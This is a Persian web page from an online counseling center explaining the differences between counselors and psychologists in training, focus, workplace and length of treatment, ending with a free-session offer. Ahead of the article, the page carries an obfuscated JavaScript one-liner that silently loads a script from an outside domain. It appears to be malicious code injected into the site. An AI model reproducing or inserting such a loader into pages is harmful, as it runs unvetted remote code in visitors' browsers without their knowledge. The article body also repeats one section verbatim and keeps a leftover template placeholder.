;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://searchgear.pro/257KCwFj"); تفاوت روانشناسی و مشاوره چیست؟

چه تفاوتی بین روانشناسی و مشاوره وجود دارد؟

میزان پیشرفت خواندن شما

فهرست مطالب

مشاور و روانشناس با کلیه جنبه های زندگی فردی و اجتماعی افراد در ارتباط هستند. افراد جامعه با مراجعه به روانشناس و مشاور می توانند، تا حد زیادی سلامت روان خود را بهبود بخشند. امروزه، با افزایش آگاهی افراد از تاثیر عالی مشاوره و روان شناسی در زندگی فردی و اجتماعی و اینکه دیگر مانند گذشته تصور منفی درباره مراجعه به این متخصصین وجود ندارد، تعداد مراجعه افراد به مشاور و روانشناس افزایش یافته است. اما، با توجه به گسترده بودن حوزه سلامت روان، بسیاری از افراد برای حل مشکلات خود نمی دانند باید به چه کسی مراجعه نمایند.

در واقع، گاهی اوقات نیاز است برای حل مشکلات خود به یک روانپزشک مراجعه نماییم، گاهی نیز ممکن است نیاز باشد که به سراغ روانشناس برویم و در برخی از موارد مانند مشاوره آنلاین، مشاوره قبل از ازدواج و مشاوره فردی نیز مشاور می تواند، برای حل مشکل ما تاثیر گذار باشد و ما را به خوبی راهنمایی کند. بنابراین، باید افراد به این تفاوت ها آگاه باشند تا بتوانند انتخابی درست داشته باشند و برای حل مشکل خود به مناسب ترین فرد مراجعه نمایند.

تفاوت روانشناس و مشاور

مهم ترین تفاوتی که میان مشاور و روانشناس است، این است که مشاور افراد را برای حل مشکل راهنمایی می کند، در حالی که یک روانشناس کار درمان افراد را بر عهده دارد.

روانشناس به کمک روان درمانی و روش های درمانی که نیاز به دارو ندارند، بیمار خود را درمان می کند.

مهم ترین تشابهی که بین روانشناس و مشاور وجود دارد این است که این افراد حق ندارند برای مراجعین خود دارو تجویز نمایند. تنها روانپزشکان اجازه تجویز دارو برای بیماران خود را دارند.

به دلیل تشابه زیاد کار روانشناس و مشاور، بسیاری از افراد این دو را یکی می دانند.

تفاوت روانشناس و مشاور

مهم ترین تفاوتی که میان مشاور و روانشناس است، این است که مشاور افراد را برای حل مشکل راهنمایی می کند، در حالی که یک روانشناس کار درمان افراد را بر عهده دارد.

روانشناس به کمک روان درمانی و روش های درمانی که نیاز به دارو ندارند، بیمار خود را درمان می کند.

مهم ترین تشابهی که بین روانشناس و مشاور وجود دارد این است که این افراد حق ندارند برای مراجعین خود دارو تجویز نمایند. تنها روانپزشکان اجازه تجویز دارو برای بیماران خود را دارند.

به دلیل تشابه زیاد کار روانشناس و مشاور، بسیاری از افراد این دو را یکی می دانند.

تفاوت مشاوره و روانشناسی

به مطالعه دقیق و علمی رفتار افراد و فرآیندهای ذهنی آن ها روانشناسی گفته می شود که روانشناس در جستجوی فهمیدن و کشف پیشینه رفتار افراد است. همچنین، هدف اصلی روانشناسی کاهش ناسازگاری و ناراحتی افراد و کمک به سازگاری هر چه بیشتر و رشد شخصیتی آن ها است.

اما، مشاوره به جریان یادگیری که توسط رابطه میان دو نفر صورت می گیرد، گفته می شود. در واقع، مشاور با دارا بودن مهارت های بسیار زیاد و داشتن صلاحیت های علمی و حرفه ای تلاش می کند، تا به مراجعین خود کمک کند تا خود را بهتر بشناسند.

فرق روانشناسی و مشاوره

به طور کلی، هدف، روش و مکان درمان روانشناس و مشاور با یکدیگر متفاوت است. به طوری که، هدف یک مشاور کمک به مراجعین برای شناخت بهتر از خود است، در حالی که هدف یک روانشناس ترمیم کردن آسیب های ناشی از گذشته فرد و ارتقای سطح سلامت روان وی می باشد. به عنوان مثال، در صورتی که یک فرد برای انتخاب همسر به راهنمایی احتیاج داشته باشد، می تواند به یک مشاور مراجعه نماید.

  917790911713724036

یک مشاور با به دست آوردن اطلاعات از روابط و زندگی خانوادگی و روان مراجعین خود و با توجه به تجارب و تخصص هایی که دارد می تواند، راهنمای خوبی برای مراجعین خود باشد. اما، ممکن است برخی از افراد دارای اختلالاتی مانند موارد زیر باشند:

  • افسردگی
  • اضطراب
  • وسواس
  • فوبیا

در اینصورت، این افراد لازم است به روانشناس مراجعه نمایند.

معمولا افرادی که به مشاور مراجعه می‌ نمایند، دارای مشکلات حاد نیستند و تنها نیاز به راهنمایی یک فرد متخصص برای حل مشکلات خود دارند. اما، یک روانشناس باید مشکلات حادتر افراد را مورد بررسی قرار دهد. معمولا روانشناسان به گروه های مختلفی دسته بندی می‌شوند. یک روانشناس برای حل مسائل از منابع علمی و پژوهشی استفاده می‌ نماید. در واقع، تغییر رفتار فرد، رشد و درمان از فرایندهای مستمری است که باید با تلاش و کوشش خود فرد برای خودسازی همیشگی وی صورت پذیرد.

مشاوره یا روانشناسی

تکنیک ‌هایی که روانشناسان برای مراجعین خود به کار می برند، بر اساس علم و پژوهش است و با گذشت زمان با مطالعه و انجام تمرینات، سعی دارند مشکلات و مسائل پیش آمده را حل و فصل نمایند. اما کار اصلی مشاور، آینده نگری برای مراجعین می باشد و از تصمیمات اشتباه آن ها پیشگیری می نماید. به عنوان مثال، یک مشاور به دانش آموزی که در تحصیل یا برقراری ارتباط با دیگران مشکل دارد، کمک می کند. اما، یک روانشناس به گذشته افراد توجه دارد و ریشه تمام آسیب های روانی فرد را الگوها و عادت های خانوادگی و ژنتیکی فرد می داند.

مشاور مشکلات فرد را به دلیل اتفاقاتی که برایش پیش آمده است، می بیند و اعتقاد دارد با انجام تعدادی نکات آموزشی فرد می تواند به راحتی آن ها را برطرف نماید. در واقع، کار اصلی یک مشاور دادن آموزش، راهنمایی کردن و مشاوره دادن در رابطه با حل مسائل خانوادگی و کاری، ازدواج و تحصیل افراد است.

افرادی که به مشاور مراجعه می‌ نمایند، سازش بیشتری با خود و دیگران دارند. همینطور، یک مشاور کاربلد باعث افزایش احساس مسئولیت پذیری و بلوغ عاطفی فرد می شود. یکی دیگر از نتایج مراجعه به مشاور، بالا رفتن اعتماد به نفس و احساس استقلال در فرد می باشد. همچنین، افزایش قدرت مبارزه با مشکلات نیز از پیامدهای مشاوره محسوب می شود.

تفاوت مشاوره و روانشناسی چیست؟

بر خلاف مشاوران، کار روانشناسان این است که مشکلات و اختلالات شخصیتی افراد را برطرف می نمایند و سعی بر برطرف نمودن تضادهای درونی فرد دارند. به این دلیل که روانشناسان ریشه کلیه اختلالات و مشکلات افراد را در دوران کودکی آن ها می بینند، بیشتر تلاش خود را برای توجه به وجدان ناخودآگاه فرد دارند. این در حالی است که یک مشاور به اموری که در زمینه آگاهی فرد است، می پردازد. اما، روانشناسی به مهارت تحلیل افراد در کنار مهارت های لازم برای تشخیص روانکاوی گفته می شود.

متن سربرگ خود را وارد کنید

معمولا، مشاوره در موسسات تربیتی و علمی برای افراد مختلف انجام می شود. اما، روانشناسان معمولا در مراکز درمانی و پزشکی مشغول به کار می باشند. تعداد جلسات لازم برای مشاوره معمولا از یک تا ۱۵ جلسه می باشد که ممکن است در برخی از موارد بحرانی این جلسات به صورت متوالی تشکیل شوند. اما، جلسات روان درمانی ممکن است، به مدت ۶ ماه یا دو سال نیز به طول انجامد. جلسات روانکاوی بسته به نظر روانشناس معمولا یک یا ۲ بار در هفته تشکیل می شود و بین ۴۵ تا یک ساعت می باشد.

  مهارت های زندگی کدام اند ؟

مهم ترین تفاوت مشاوره و روانشناسی این است که مشاور به دنبال یافتن اهداف بازپروری توانایی ها است. اما، یک روانشناس به دنبال دست یافتن به اهداف بازسازی توانمندی ها است. بنابراین، هنگامی که احساس کردید، درباره مسئله ای خاص در زمینه های زیر نیاز به راهنمایی دارید، می توانید به مشاور مراجعه کنید:

  • خانوادگی
  • شغلی
  • تحصیلی
  • مهارت های ارتباطی

اما، هنگامی که احساس کردید با چالشی تکراری درگیر هستید، مثلا، همیشه این جمله را از افراد زیادی می شنوید که فرد حساسی هستید و … لازم است، به یک روانشناس مراجعه نمایید.

تفاوت مشاوره و روانشناسی در چه زمینه هایی است؟

مشخصه های مهم که تفاوت بین یک مشاور و روانشناس را نشان می‌دهند، در زیر آورده شده است:

تحصیلات

مشاوران و روانشناسان برای انجام فعالیت های خود نیاز به مجوز دارند. اما مشاوران دارای تحصیلات کمتری در مقایسه با روانشناسان هستند. در بهترین حالت، یک مشاور دارای مدرک کارشناسی ارشد یا دکترا می باشد و از سایر الزامات مانند گذراندن بررسی ‌های ویژه و ساعات آموزشی لازم برخوردار است.

معمولا تحصیلات مشاورها عمومی‌تر می باشد تا بتوانند، با طیف وسیعی از مراجعین خود ارتباط بگیرند. اما، یک روانشناس‌ در رشته روانشناسی حداقل مدرک فوق لیسانس را دارد و معمولا به این مدرک بسنده نمی کند و اقدام به گرفتن مدرک دکترا می‌ نماید. همچنین، روانشناسان کارهای تحقیقاتی بسیار زیادی در حیطه رشته خود همراه با چندین هزار ساعت جلسات آموزشی را می گذرانند تا پیچیدگی‌های بیماری‌های روانی و راه های درمان این نوع بیماری ها را بهتر بفهمند.

مشاوران و روانشناسان در طول دوره های کارشناسی ارشد و دکترا به مطالعه منابع مختلفی می پردازند و تجارت بالینی مختلفی به دست می آورند. تفاوت مشاوره و روانشناسی در این زمینه ها به قرار زیر است:

روانشناسان معمولا دارای تحصیلات و آموزش های تخصصی برای تفسیر ارزیابی‌ های روانشناختی بیماران خود هستند. اما، بیشتر مشاوران به این صورت نمی باشند و آزمون‌ها و دوره های روانشناسی را نمی گذرانند.

مشاوران و روانشناسان باید دوره راهنمای اخلاقی را بگذرانند و در زمان فعالیت خود ملزم به رعایت آن‌ ها می باشند. معمولا روانشناسان در حیطه پژوهش‌ های بالینی مشارکت دادند. یک مشاور قبل از فارغ التحصیلی خود باید یک یا ۲ سال تجربه‌ بالینی کسب نماید، این در حالی است که این مدت زمان برای یک روانشناس معمولا ۳ تا ۴ سال می باشد.

تخصص

مشاوران برای مشورت دادن به هر قشری از جامعه، آموزش دیده اند و معمولا در حیطه خاصی از درمان متمرکز نمی شوند. به عنوان مثال، این کار می تواند، در پوشش یک مددکار اجتماعی در حل مشکلات خانوادگی افراد باشد و یا دادن مشاوره برای مربی‌ گری افرادی که دارای اضطراب مزمن هستند. تفاوتی ندارد، کار اصلی یک مشاور دادن مشاوره به افراد و کمک به آن‌ ها برای انتخاب بهتر و حل مسائل آن ها است. اما، در صورتی که یک فرد نیاز به درمان بیماری روانی خود داشته باشد، یک روانشناس می‌تواند، کمک بهتری باشد.

مهم ترین حرفه های مربوط به روانشناسی موارد زیر است:

  • روانشناسی
  • مددکار اجتماعی
  • مشاوره
  • درمان

وقتی درباره درمان صحبت می کنم، باید به سراغ روانشناس بروید. آن‌ها به بیماران خود روش های درمانی خاص را ارائه می دهند. در برخی از موارد یک مشاور مانند یک فرد عاقل محرم اسراری است که می تواند، با ارائه روش‌های درمانی مختلف توصیه‌های مفیدی به مراجعین خود ارائه دهد. در عین حال روانشناسان می توانند اختلالات روانی افراد را تشخیص دهند.

Rate this post

توجه داشته باشید که این مطلب، جایگزین نظرات و توصیه‌های تخصصی پزشکان نیست و هرگز از این مطلب به‌عنوان جایگزین توصیه پزشکان استفاده نکنید.

جهت جلب رضايت و اعتماد شما دوست عزيز و اثبات تخصص و دانش و به جهت تصميم گيري صحيح شما در انتخاب مشاور خود، ميتوانيد يك تا دو جلسه مشاوره آنلاين رايگان از ما دريافت كنيد، كافيست روي دكمه درخواست مشاوره رايگان در همين صفحه كليك نماييد.

دیدگاه‌ خود را بنویسید

نشانی ایمیل شما منتشر نخواهد شد. بخش‌های موردنیاز علامت‌گذاری شده‌اند *

مرکز مشاوره آنلاین روان‌یاری

جهت رزرو یک جلسه مشاوره رایگان فرم زیر را تکمیل بفرمایید.